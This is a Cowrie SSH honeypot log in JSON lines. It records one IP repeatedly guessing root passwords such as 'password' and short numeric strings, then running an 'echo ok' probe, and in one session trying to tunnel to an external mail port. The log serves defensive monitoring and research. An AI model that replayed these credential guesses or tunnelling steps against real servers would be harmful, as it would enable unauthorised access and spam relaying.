{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:49:06.521723Z","src_ip":"212.227.125.160","session":"0660f42cac84"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:49:06.522516Z","src_ip":"212.227.125.160","session":"0660f42cac84"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:49:06.552080Z","src_ip":"212.227.125.160","session":"0660f42cac84"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:49:06.553221Z","src_ip":"212.227.125.160","session":"0660f42cac84"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59772,"dst_ip":"1.2.3.4","dst_port":22,"session":"a42021fb1fd2","protocol":"ssh","message":"New connection: 212.227.125.160:59772 (1.2.3.4:22) [session: a42021fb1fd2]","sensor":"my-vps","timestamp":"2025-08-28T11:49:06.574548Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:49:06.575407Z","src_ip":"212.227.125.160","session":"a42021fb1fd2"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:49:06.598569Z","src_ip":"212.227.125.160","session":"a42021fb1fd2"}
{"eventid":"cowrie.login.success","username":"root","password":"100586","message":"login attempt [root/100586] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:49:06.673104Z","src_ip":"212.227.125.160","session":"a42021fb1fd2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:49:06.734457Z","src_ip":"212.227.125.160","session":"a42021fb1fd2"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:49:06.735304Z","src_ip":"212.227.125.160","session":"a42021fb1fd2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:49:06.759758Z","src_ip":"212.227.125.160","session":"a42021fb1fd2"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:49:06.760713Z","src_ip":"212.227.125.160","session":"a42021fb1fd2"}
{"eventid":"cowrie.session.closed","duration":30.843064069747925,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:49:10.841428Z","src_ip":"213.190.206.223","session":"b90eae8101c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59776,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fa2394ecfc7","protocol":"ssh","message":"New connection: 212.227.125.160:59776 (1.2.3.4:22) [session: 7fa2394ecfc7]","sensor":"my-vps","timestamp":"2025-08-28T11:49:18.006725Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:49:18.244569Z","src_ip":"212.227.125.160","session":"7fa2394ecfc7"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:49:18.266449Z","src_ip":"212.227.125.160","session":"7fa2394ecfc7"}
{"eventid":"cowrie.login.success","username":"root","password":"100487","message":"login attempt [root/100487] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:49:18.898231Z","src_ip":"212.227.125.160","session":"7fa2394ecfc7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:49:19.461496Z","src_ip":"212.227.125.160","session":"7fa2394ecfc7"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:49:19.462189Z","src_ip":"212.227.125.160","session":"7fa2394ecfc7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:49:19.501059Z","src_ip":"212.227.125.160","session":"7fa2394ecfc7"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:49:19.502100Z","src_ip":"212.227.125.160","session":"7fa2394ecfc7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38226,"dst_ip":"1.2.3.4","dst_port":22,"session":"775a7f404096","protocol":"ssh","message":"New connection: 212.227.125.160:38226 (1.2.3.4:22) [session: 775a7f404096]","sensor":"my-vps","timestamp":"2025-08-28T11:49:19.524361Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:49:19.535370Z","src_ip":"212.227.125.160","session":"775a7f404096"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:49:19.551292Z","src_ip":"212.227.125.160","session":"775a7f404096"}
{"eventid":"cowrie.login.success","username":"root","password":"100283","message":"login attempt [root/100283] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:49:19.642195Z","src_ip":"212.227.125.160","session":"775a7f404096"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:49:19.719830Z","src_ip":"212.227.125.160","session":"775a7f404096"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:49:19.720485Z","src_ip":"212.227.125.160","session":"775a7f404096"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:49:19.744231Z","src_ip":"212.227.125.160","session":"775a7f404096"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:49:19.746149Z","src_ip":"212.227.125.160","session":"775a7f404096"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38236,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2930ac17a4b","protocol":"ssh","message":"New connection: 212.227.125.160:38236 (1.2.3.4:22) [session: f2930ac17a4b]","sensor":"my-vps","timestamp":"2025-08-28T11:49:19.766139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:49:19.767862Z","src_ip":"212.227.125.160","session":"f2930ac17a4b"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:49:19.789942Z","src_ip":"212.227.125.160","session":"f2930ac17a4b"}
{"eventid":"cowrie.login.success","username":"root","password":"063","message":"login attempt [root/063] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:49:19.889732Z","src_ip":"212.227.125.160","session":"f2930ac17a4b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:49:19.951597Z","src_ip":"212.227.125.160","session":"f2930ac17a4b"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:49:19.952309Z","src_ip":"212.227.125.160","session":"f2930ac17a4b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:49:19.976313Z","src_ip":"212.227.125.160","session":"f2930ac17a4b"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:49:19.977300Z","src_ip":"212.227.125.160","session":"f2930ac17a4b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38248,"dst_ip":"1.2.3.4","dst_port":22,"session":"dadd0a337af7","protocol":"ssh","message":"New connection: 212.227.125.160:38248 (1.2.3.4:22) [session: dadd0a337af7]","sensor":"my-vps","timestamp":"2025-08-28T11:49:19.998224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:49:20.004923Z","src_ip":"212.227.125.160","session":"dadd0a337af7"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:49:20.040374Z","src_ip":"212.227.125.160","session":"dadd0a337af7"}
{"eventid":"cowrie.login.success","username":"root","password":"0617091","message":"login attempt [root/0617091] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:49:20.121516Z","src_ip":"212.227.125.160","session":"dadd0a337af7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:49:20.193136Z","src_ip":"212.227.125.160","session":"dadd0a337af7"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:49:20.193856Z","src_ip":"212.227.125.160","session":"dadd0a337af7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:49:20.232578Z","src_ip":"212.227.125.160","session":"dadd0a337af7"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:49:20.233728Z","src_ip":"212.227.125.160","session":"dadd0a337af7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59590,"dst_ip":"1.2.3.4","dst_port":22,"session":"7848a3f58e42","protocol":"ssh","message":"New connection: 212.227.125.160:59590 (1.2.3.4:22) [session: 7848a3f58e42]","sensor":"my-vps","timestamp":"2025-08-28T11:49:24.164011Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T11:49:24.165242Z","src_ip":"212.227.125.160","session":"7848a3f58e42"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T11:49:24.246542Z","src_ip":"212.227.125.160","session":"7848a3f58e42"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:49:24.663362Z","src_ip":"212.227.125.160","session":"7848a3f58e42"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.125.160","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-28T11:49:24.745812Z","session":"7848a3f58e42"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-28T11:49:24.826990Z","src_ip":"212.227.125.160","session":"7848a3f58e42"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:49:24.909465Z","src_ip":"212.227.125.160","session":"7848a3f58e42"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38660,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb27796eb09a","protocol":"ssh","message":"New connection: 212.227.125.160:38660 (1.2.3.4:22) [session: bb27796eb09a]","sensor":"my-vps","timestamp":"2025-08-28T11:49:28.640591Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:49:28.641535Z","src_ip":"212.227.125.160","session":"bb27796eb09a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:49:28.809632Z","src_ip":"212.227.125.160","session":"bb27796eb09a"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"qwerty","message":"login attempt [oracle/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T11:49:29.317922Z","src_ip":"212.227.125.160","session":"bb27796eb09a"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:49:30.489563Z","src_ip":"212.227.125.160","session":"bb27796eb09a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38262,"dst_ip":"1.2.3.4","dst_port":22,"session":"3060a58009ae","protocol":"ssh","message":"New connection: 212.227.125.160:38262 (1.2.3.4:22) [session: 3060a58009ae]","sensor":"my-vps","timestamp":"2025-08-28T11:49:31.446138Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:49:31.449632Z","src_ip":"212.227.125.160","session":"3060a58009ae"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:49:31.471320Z","src_ip":"212.227.125.160","session":"3060a58009ae"}
{"eventid":"cowrie.login.success","username":"root","password":"0404","message":"login attempt [root/0404] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:49:31.567298Z","src_ip":"212.227.125.160","session":"3060a58009ae"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:49:31.628245Z","src_ip":"212.227.125.160","session":"3060a58009ae"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:49:31.628949Z","src_ip":"212.227.125.160","session":"3060a58009ae"}
